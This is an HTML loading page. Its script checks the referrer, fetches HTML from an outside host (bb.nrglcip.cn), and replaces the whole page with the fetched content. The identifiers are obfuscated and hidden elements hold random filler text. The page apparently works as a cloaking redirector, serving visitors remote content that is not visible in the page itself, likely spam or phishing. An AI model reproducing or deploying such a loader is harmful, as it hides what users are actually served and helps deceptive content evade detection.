<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .k0a6ZxT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .k0a6ZxT .piOinnOz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .k0a6ZxT .content {
            line-height: 50px;
            text-align: center
        }

        .k0a6ZxT .img {
            width: 100%
        }

        .k0a6ZxT .TOPgBFu {
            text-align: center
        }

        .k0a6ZxT .TOPgBFu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .k0a6ZxT .TOPgBFu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .k0a6ZxT .TOPgBFu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .k0a6ZxT .TOPgBFu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .k0a6ZxT .TOPgBFu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .k0a6ZxT .TOPgBFu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .k0a6ZxT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function o71VcDaDOfW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zwjkM = o71VcDaDOfW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zwjkM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zwjkM +".html?a=share";
		}
		
        Muj6wkj=url+"#"+new Date().getTime();
        Muj6wkj && function() {
            $.get(Muj6wkj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>hRobC1RFAN5qtTkU</div>
<h1 style='display:none' >EEP4m39rOa8TRsIrao3UDADDQx5rqu42</h1>
<b style='display:none' >tbuTac9TBrn</b>
<ul style='display:none' >SEXyixZ9iTjH7N6UpPjanxNMXaplav9TlLPBC0ydI5mTuIRYWW1VZLOBnU0nn5IPhHZPzWE5f7WZsEYJAeXk</ul>
<div style='display:none'>hRobC1RFAN5qtTkU</div>
<p  style='display:none'>yf6Fuh7XMUOrbssDMuV9cZlybX2HW9OCQm9tzD7WgXXjsBU47b6ycgqWkJTSq1jFb7oc</p>
<div style='display:none'>hRobC1RFAN5qtTkU</div>
<div style='display:none'>hRobC1RFAN5qtTkU</div><div class="k0a6ZxT">
    <div class="piOinnOz">
        <div class="TOPgBFu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >y5HPul2pR9pxXIg</ul>
<a  href='#' style='display:none'>jlzwsZh5r113QTzRt9DH37jMV3uyiYSpKWYE9E4rQQX3pwQtKxqEr7OPSXErHHNYS2d</a>
<div style='display:none'>yfu3elXppAvPEYik3r9NwTyoqfjYroS49Ugt2Fgw77Z</div></body>
</html>